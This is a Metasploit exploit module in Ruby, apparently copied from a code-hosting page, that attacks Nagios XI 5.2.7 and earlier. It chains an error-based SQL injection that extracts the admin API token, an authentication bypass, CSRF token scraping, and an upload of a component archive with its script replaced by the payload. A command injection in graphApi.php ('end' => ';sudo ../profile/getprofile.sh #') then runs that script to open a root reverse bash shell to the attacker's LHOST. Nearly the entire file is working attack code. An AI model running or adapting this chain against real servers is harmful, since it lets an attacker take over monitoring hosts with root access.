276 lines
7.1 KiB
Ruby
276 lines
7.1 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Nagios XI Chained Remote Code Execution',
|
|
'Description' => %q{
|
|
This module exploits an SQL injection, auth bypass, file upload,
|
|
command injection, and privilege escalation in Nagios XI <= 5.2.7
|
|
to pop a root shell.
|
|
},
|
|
'Author' => [
|
|
'Francesco Oddo', # Vulnerability discovery
|
|
'wvu' # Metasploit module
|
|
],
|
|
'References' => [
|
|
['EDB', '39899']
|
|
],
|
|
'DisclosureDate' => 'Mar 6 2016',
|
|
'License' => MSF_LICENSE,
|
|
'Platform' => 'unix',
|
|
'Arch' => ARCH_CMD,
|
|
'Privileged' => true,
|
|
'Payload' => {
|
|
'Compat' => {
|
|
'PayloadType' => 'cmd cmd_bash',
|
|
'RequiredCmd' => 'generic bash-tcp php perl python openssl gawk'
|
|
}
|
|
},
|
|
'Targets' => [
|
|
['Nagios XI <= 5.2.7', version: Gem::Version.new('5.2.7')]
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DefaultOptions' => {
|
|
'PAYLOAD' => 'cmd/unix/reverse_bash',
|
|
'LHOST' => Rex::Socket.source_address
|
|
}
|
|
))
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi!(
|
|
'method' => 'GET',
|
|
'uri' => '/nagiosxi/'
|
|
)
|
|
|
|
return unless res && (html = res.get_html_document)
|
|
|
|
if (version = html.at('//input[@name = "version"]/@value'))
|
|
vprint_status("Nagios XI version: #{version}")
|
|
if Gem::Version.new(version) <= target[:version]
|
|
return CheckCode::Appears
|
|
end
|
|
end
|
|
|
|
CheckCode::Safe
|
|
end
|
|
|
|
def exploit
|
|
if check != CheckCode::Appears
|
|
fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
|
|
end
|
|
|
|
print_status('Getting API token')
|
|
get_api_token
|
|
print_status('Getting admin cookie')
|
|
get_admin_cookie
|
|
print_status('Getting monitored host')
|
|
get_monitored_host
|
|
|
|
print_status('Downloading component')
|
|
download_profile_component
|
|
print_status('Uploading root shell')
|
|
upload_root_shell
|
|
print_status('Popping shell!')
|
|
pop_dat_shell
|
|
end
|
|
|
|
#
|
|
# Cleanup methods
|
|
#
|
|
|
|
def on_new_session(session)
|
|
super
|
|
|
|
print_status('Cleaning up...')
|
|
|
|
commands = [
|
|
'rm -rf ../profile',
|
|
'unzip -qd .. ../../../../tmp/component-profile.zip',
|
|
'chown -R nagios:nagios ../profile',
|
|
"rm -f ../../../../tmp/component-#{zip_filename}"
|
|
]
|
|
|
|
commands.each do |command|
|
|
vprint_status(command)
|
|
session.shell_command_token(command)
|
|
end
|
|
end
|
|
|
|
#
|
|
# Exploit methods
|
|
#
|
|
|
|
def get_api_token
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => '/nagiosxi/includes/components/nagiosim/nagiosim.php',
|
|
'vars_get' => {
|
|
'mode' => 'resolve',
|
|
'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
|
|
'SELECT backend_ticket FROM xi_users WHERE user_id=1' \
|
|
'),FLOOR(RAND(0)*2))x ' \
|
|
'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
|
|
}
|
|
)
|
|
|
|
if res && res.body =~ /Duplicate entry '(.*?).'/
|
|
@api_token = $1
|
|
vprint_good("API token: #{@api_token}")
|
|
else
|
|
fail_with(Failure::UnexpectedReply, 'API token not found! punt!')
|
|
end
|
|
end
|
|
|
|
def get_admin_cookie
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => '/nagiosxi/rr.php',
|
|
'vars_get' => {
|
|
'uid' => "1-#{Rex::Text.rand_text_alpha(8)}-" +
|
|
Digest::MD5.hexdigest(@api_token)
|
|
}
|
|
)
|
|
|
|
if res && (@admin_cookie = res.get_cookies.split('; ').last)
|
|
vprint_good("Admin cookie: #{@admin_cookie}")
|
|
get_csrf_token(res.body)
|
|
else
|
|
fail_with(Failure::NoAccess, 'Admin cookie not found! punt!')
|
|
end
|
|
end
|
|
|
|
def get_csrf_token(body)
|
|
if body =~ /nsp_str = "(.*?)"/
|
|
@csrf_token = $1
|
|
vprint_good("CSRF token: #{@csrf_token}")
|
|
else
|
|
fail_with(Failure::UnexpectedReply, 'CSRF token not found! punt!')
|
|
end
|
|
end
|
|
|
|
def get_monitored_host
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => '/nagiosxi/ajaxhelper.php',
|
|
'cookie' => @admin_cookie,
|
|
'vars_get' => {
|
|
'cmd' => 'getxicoreajax',
|
|
'opts' => '{"func":"get_hoststatus_table"}',
|
|
'nsp' => @csrf_token
|
|
}
|
|
)
|
|
|
|
return unless res && (html = res.get_html_document)
|
|
|
|
if (@monitored_host = html.at('//div[@class = "hostname"]/a/text()'))
|
|
vprint_good("Monitored host: #{@monitored_host}")
|
|
else
|
|
fail_with(Failure::UnexpectedReply, 'Monitored host not found! punt!')
|
|
end
|
|
end
|
|
|
|
def download_profile_component
|
|
res = send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => '/nagiosxi/admin/components.php',
|
|
'cookie' => @admin_cookie,
|
|
'vars_get' => {
|
|
'download' => 'profile'
|
|
}
|
|
)
|
|
|
|
if res && res.body =~ /^PK\x03\x04/
|
|
@profile_component = res.body
|
|
else
|
|
fail_with(Failure::UnexpectedReply, 'Failed to download component! punt!')
|
|
end
|
|
end
|
|
|
|
def upload_root_shell
|
|
mime = Rex::MIME::Message.new
|
|
mime.add_part(@csrf_token, nil, nil, 'form-data; name="nsp"')
|
|
mime.add_part('1', nil, nil, 'form-data; name="upload"')
|
|
mime.add_part('1000000', nil, nil, 'form-data; name="MAX_FILE_SIZE"')
|
|
mime.add_part(payload_zip, 'application/zip', 'binary',
|
|
'form-data; name="uploadedfile"; ' \
|
|
"filename=\"#{zip_filename}\"")
|
|
|
|
res = send_request_cgi!(
|
|
'method' => 'POST',
|
|
'uri' => '/nagiosxi/admin/components.php',
|
|
'cookie' => @admin_cookie,
|
|
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
|
|
'data' => mime.to_s
|
|
)
|
|
|
|
if res && res.code != 200
|
|
if res.redirect? && res.redirection.path == '/nagiosxi/install.php'
|
|
vprint_warning('Nagios XI not configured')
|
|
else
|
|
fail_with(Failure::PayloadFailed, 'Failed to upload root shell! punt!')
|
|
end
|
|
end
|
|
end
|
|
|
|
def pop_dat_shell
|
|
send_request_cgi(
|
|
'method' => 'GET',
|
|
'uri' => '/nagiosxi/includes/components/perfdata/graphApi.php',
|
|
'cookie' => @admin_cookie,
|
|
'vars_get' => {
|
|
'host' => @monitored_host,
|
|
'end' => ';sudo ../profile/getprofile.sh #'
|
|
}
|
|
)
|
|
end
|
|
|
|
#
|
|
# Support methods
|
|
#
|
|
|
|
def payload_zip
|
|
zip = Rex::Zip::Archive.new
|
|
|
|
Zip::File.open_buffer(@profile_component) do |z|
|
|
z.each do |f|
|
|
zip.entries << Rex::Zip::Entry.new(
|
|
f.name,
|
|
(if f.ftype == :file
|
|
if f.name == 'profile/getprofile.sh'
|
|
payload.encoded
|
|
else
|
|
z.read(f)
|
|
end
|
|
else
|
|
''
|
|
end),
|
|
Rex::Zip::CM_DEFLATE,
|
|
nil,
|
|
(Rex::Zip::EFA_ISDIR if f.ftype == :directory)
|
|
)
|
|
end
|
|
end
|
|
|
|
zip.pack
|
|
end
|
|
|
|
#
|
|
# Utility methods
|
|
#
|
|
|
|
def zip_filename
|
|
@zip_filename ||= Rex::Text.rand_text_alpha(8) + '.zip'
|
|
end
|
|
|
|
end
|